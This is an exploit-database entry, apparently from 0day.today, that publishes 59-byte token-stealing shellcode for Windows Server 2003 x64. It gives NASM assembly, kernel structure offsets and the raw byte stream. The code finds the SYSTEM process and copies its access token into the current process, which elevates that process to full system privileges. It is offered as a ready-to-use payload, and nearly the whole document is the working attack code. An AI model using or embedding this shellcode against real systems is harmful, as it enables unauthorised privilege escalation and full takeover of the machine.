win2003/x64 - Token Stealing shellcode - 59 bytes

2015-08-20T00:00:00
ID 1337DAY-ID-24106
Type zdt
Reporter Fitzl Csaba
Modified 2015-08-20T00:00:00

Description

Exploit for win64 platform in category shellcode

                                        
                                            ;token stealing shellcode Win 2003 x64
;based on the widely available x86 version
;syntax for NASM
;Author: Csaba Fitzl, @theevilbit
 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;important structures and offsets;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
 
;kd> dt -r1 nt!_TEB
;   +0x110 SystemReserved1  : [54] Ptr64 Void
;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly
 
;kd> dt -r1 nt!_KTHREAD
;   +0x048 ApcState         : _KAPC_STATE
;     +0x000 ApcListHead      : [2] _LIST_ENTRY
;     +0x020 Process          : Ptr64 _KPROCESS
 
;kd> dt -r1 nt!_EPROCESS
;   +0x0d8 UniqueProcessId  : Ptr64 Void
;   +0x0e0 ActiveProcessLinks : _LIST_ENTRY
;     +0x000 Flink            : Ptr64 _LIST_ENTRY
;     +0x008 Blink            : Ptr64 _LIST_ENTRY
;  +0x160 Token            : _EX_FAST_REF
;     +0x000 Object           : Ptr64 Void
;     +0x000 RefCnt           : Pos 0, 4 Bits
;     +0x000 Value            : Uint8B
 
BITS 64
 
global start
 
section .text
 
start:
mov     rax, [gs:0x188]         ;Get current ETHREAD in
mov     rax, [rax+0x68]         ;Get current EPROCESS address
mov     rcx, rax                ;Copy current EPROCESS address to RCX
 
find_system_process:
mov     rax, [rax+0xe0]         ;Next EPROCESS ActiveProcessLinks.Flink
sub     rax, 0xe0               ;Go to the beginning of the EPROCESS structure
mov     r9 , [rax+0xd8]         ;Copy PID to R9
cmp     r9 , 0x4                ;Compare R9 to SYSTEM PID (=4)
jnz short find_system_process   ;If not SYSTEM got to next EPROCESS
 
stealing:
mov     rdx, [rax+0x160]        ;Copy SYSTEM process token address to RDX
mov     [rcx+0x160], rdx        ;Steal token with overwriting our current process's token address
retn    0x10
 
;byte stream:
;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1"
;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88"
;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00"
;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00"

#  0day.today [2018-02-19]  #